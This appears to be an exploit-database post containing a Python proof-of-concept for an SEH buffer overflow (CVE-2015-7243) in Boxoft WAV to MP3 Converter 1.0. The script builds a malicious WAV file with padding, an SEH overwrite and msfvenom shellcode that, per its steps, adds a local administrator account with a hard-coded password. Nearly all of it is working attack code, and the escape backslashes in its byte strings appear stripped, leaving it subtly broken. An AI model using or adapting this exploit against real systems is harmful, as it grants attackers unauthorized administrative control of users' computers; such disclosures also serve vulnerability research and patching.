Boxoft Wav To MP3 Converter 1.0 Buffer Overflow
Posted on 01 June 2016
# Exploit Title: Boxoft WAV to MP3 Converter - SEH Based Buffer Overflow Exploit # Date: 31/5/2016 # Exploit Author: Mandar # Vendor Homepage: http://www.boxoft.com/wav-to-mp3/ # Software Link: http://www.boxoft.com/wav-to-mp3/setup(free-wav-to-mp3).exe # Version: Boxoft WAV to MP3 Converter v1.0 # Tested on: Windows XP SP3, Windows 7 SP1 (64 bit), Windows 8.1, Windows 10 (64 bit) # CVE : CVE-2015-7243 # Reference : https://www.exploit-db.com/exploits/38035/ # Category: Local Exploit # Steps to reproduce: # - Run the Boxoft WAV to MP3 Converter and select batch convert mode and hit next # - Add exploit.wav file (generated by the PoC) and hit the convert to mp3 option # - User "Hack" (pass-Hack@123) will be added to the local administrative group. #!/usr/bin/python import sys, struct file="exploit.wav" junk = "x41" * 4132 #offset to Next SEH endofbuff = "x42" * 5300 #junk nseh = "xebx06x90x90" # hop over SEH seh = "xd3x24x40x00" # pop ecx pop ebp ret (C:Program Files (x86)Boxoft Wav to MP3 (freeware)wavtomp3.exe) #msfvenom -a x86 --platform windows -p windows/adduser USER=hack PASS=Hack@123 -e x86/shikata_ga_nai -b "x00" EXITFUNC=process -f python buf = "" buf += "xdbxc0xd9x74x24xf4x5fx29xc9xb1x43xb8x27" buf += "x27x79xeex31x47x19x03x47x19x83xc7x04xc5" buf += "xd2x85x06x8bx1dx76xd7xebx94x93xe6x2bxc2" buf += "xd0x59x9bx80xb5x55x50xc4x2dxedx14xc1x42" buf += "x46x92x37x6cx57x8ex04xefxdbxccx58xcfxe2" buf += "x1fxadx0ex22x7dx5cx42xfbx0axf3x73x88x46" buf += "xc8xf8xc2x47x48x1cx92x66x79xb3xa8x31x59" buf += "x35x7cx4axd0x2dx61x76xaaxc6x51x0dx2dx0f" buf += "xa8xeex82x6ex04x1dxdaxb7xa3xfdxa9xc1xd7" buf += "x80xa9x15xa5x5ex3fx8ex0dx15xe7x6axafxfa" buf += "x7exf8xa3xb7xf5xa6xa7x46xd9xdcxdcxc3xdc" buf += "x32x55x97xfax96x3dx4cx62x8ex9bx23x9bxd0" buf += "x43x9cx39x9ax6exc9x33xc1xe4x0cxc1x7fx4a" buf += "x0exd9x7fxfbx66xe8xf4x94xf1xf5xdexd0x0d" buf += "xbcx43x70x85x19x16xc0xc8x99xccx07xf4x19" buf += "xe5xf7x03x01x8cxf2x48x85x7cx8fxc1x60x83" buf += "x3cxe2xa0xe0xafx78x65x82x57xe5x59x63xcb" buf += "xc5xf7x1ex7fx25x7dx92x1ax57x5dx3cx84xf4" buf += "xf6x9cx0ex9bx6bxb6xcex6ax5ex7bxefxa3xdf" buf += "x3fxabx9bxf9x99x13xb5x60x92x73x25x04x39" buf += "x15xd9xbdxcfxbax54x32x10x04xf2xdfx39xe8" buf += "x93x6cxcex86x02xe7x41x15xb7x27xf6xb8x54" buf += "x43x26x14xdbxd7x62x6a" nop = "x90" * 10 payload = junk + nseh + seh + nop + buf + endofbuff writeFile = open (file, "w") writeFile.write( payload ) writeFile.close()
